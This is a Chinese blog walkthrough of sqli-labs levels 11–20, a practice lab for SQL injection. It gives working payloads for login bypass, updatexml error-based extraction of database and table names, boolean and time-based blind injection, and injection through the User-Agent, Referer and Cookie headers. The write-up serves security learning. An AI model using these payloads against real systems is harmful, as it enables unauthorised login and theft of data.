2019-05-14

sqli-labs(11-20)

第十一关

界面终于换口味啦

登录系统,目测万能密码或者md5

1、先试试万能密码

username=1' or 1#password=123    返回登录成功,用户名密码为id=1时的数据

如果在发包中要对 # 进行url编码    %23

uname=1%27+or+1%23&passwd=123&submit=Submit

2、额但是我要爆库

mysql_fetch_array() 函数从结果集中取得一行作为关联数组,所以虽然本地测试万能密码能得到所有结果,但是该函数只从结果集中取得一行,有点8xing

3、尝试    uname=11'&passwd=1&submit=Submit

出现报错

可以报错注入,但是为什么是这个报错呢?    1' LIMIT 0,1    明明没有在passwd中的1后面加单引号,猜测这个单引号是本来就在的,但是前面那个单引号去哪了,被前面uname本来有的单引号配对走了。验证查询语句

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

4、构造报错注入

uname=11' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=1&submit=Submit


第十二关

1、界面和十一题一样,先尝试万能密码    username=1' or 1#password=123 

发现不行。。。

username=1" or 1#password=123 

报错,应该是注释符出错了,构造    username=1" or 1 and "1"="1&password=1" or 1 and "1"="1

结果为空

通常注释符出错是因为添加了括号,所以利用and

至于上面的万能密码结果为什么为空?

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

带入变量之后

SELECT username, password FROM users WHERE username=("1" or 1 and "1"="1") and password=("1" or 1 and "1"="1") LIMIT 0,1 

当然,万能密码还是有的,比如    uname=\&passwd=)or 1#&submit=Submit

2、说明存在报错注入,尝试    

uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1&passwd=1&submit=Submit


第十三关

和第十二关类似,把双引号改为单引号即可


第十四关

发现如下都可以

uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1&passwd=1&submit=Submit

uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=1&submit=Submit

源码为

@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";


第十五关

直接在bp尝试 

bool盲注

uname=admin' and 1 --+&passwd=admin&submit=Submit

uname=admin' and 0  --+&passwd=admin&submit=Submit

脚本参考第七关

也可以时间盲注

脚本参考第七关


第十六关

这题又是新的组合。。。

括号+单引号,括号+双引号,单引号,双引号,两个括号+单引号

看了源码才知道怎么闭合。。。

相当于    SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1

构造    uname=") or 1--+&passwd=a&submit=Submit


第十七关

页面提示

猜测是update操作,猜测sql语句大概为

update users set password=$passwd where username=$uname;

1、尝试

uname=adn&passwd=a&submit=Submit

回显如下,应该是用户名不存在导致更新失败,验证操作应该是对操作影响条数进行判断

2、尝试

uname=a' or 1&passwd=11&submit=Submit    失败

uname=a" or 1&passwd=11&submit=Submit    失败

uname=a')# or 1&passwd=11&submit=Submit    失败

uname=a")# or 1&passwd=11&submit=Submit     失败

3、看看源码把,原来是分两次查询的,而且第一次查找uname还有check函数。。。

4、根据最后一行可以用报错注入,并且过滤函数没有对passwd进行过滤

魔术引号    PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除

当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。

长度不能超过20

其中过滤函数    mysql_real_escape_string()

函数转义SQL 语句中使用的字符串中的特殊字符。

\x00     \n     \r     \     '     "     \x1a 

构造    uname=admin&passwd=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+&submit=Submit

这里uname一定要存在,不然无法进入下一次update操作


第十八关

不出意外应该是    insert into    操作记录访问ip

1、查看源代码

2、发现可以报错注入,并且只能通过uagent、ip进行,因为没有进行过滤

首先要登陆成功才能继续。。。

但是ip试了几次不知道为啥不行,

$_server[‘Remote_ADDR’]

用户IP将在HTTP标头中提供(例如X-Forwarded-For、client-ip)

在bp对ua进行修改为    User-Agent:1'

闭合构造    User-Agent:1' and '1'='1

报错注入    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1


第十九关

之后每题都要求先登录。。。并且都是对uname和passwd进行check

和第十八关类似,把注入点从ua改成referer即可

报错注入    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1

第二十关

在登陆成功之后出现了cookie,修改    Cookie: uname=admin'

还是报错注入,构造    1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,588评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,456评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,146评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,387评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,481评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,510评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,522评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,296评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,745评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,039评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,202评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,901评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,538评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,165评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,415评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,081评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,085评论 2 352

推荐阅读更多精彩内容

  • sqli-labs(1-10) -- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上...
    glotozz阅读 276评论 0 0
  • less-1&2 一打开就来了一句"Please input the ID as parameter with n...
    l0st阅读 4,182评论 0 1
  • 基于错误_POST_更新查询注入 我讨厌这个错误回显。 这一关有很多不同的解法,我们将依次分析(这篇看上去会很长)...
    Hyafinthus阅读 4,028评论 7 12
  • 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert、update) ...
    JasonChiu17阅读 2,058评论 0 0
  • 1 DDL创建数据库 1 直接创建数据库 create databases 数据库名; 2 判断是否存在并创建数据...
    纪绘阅读 569评论 0 0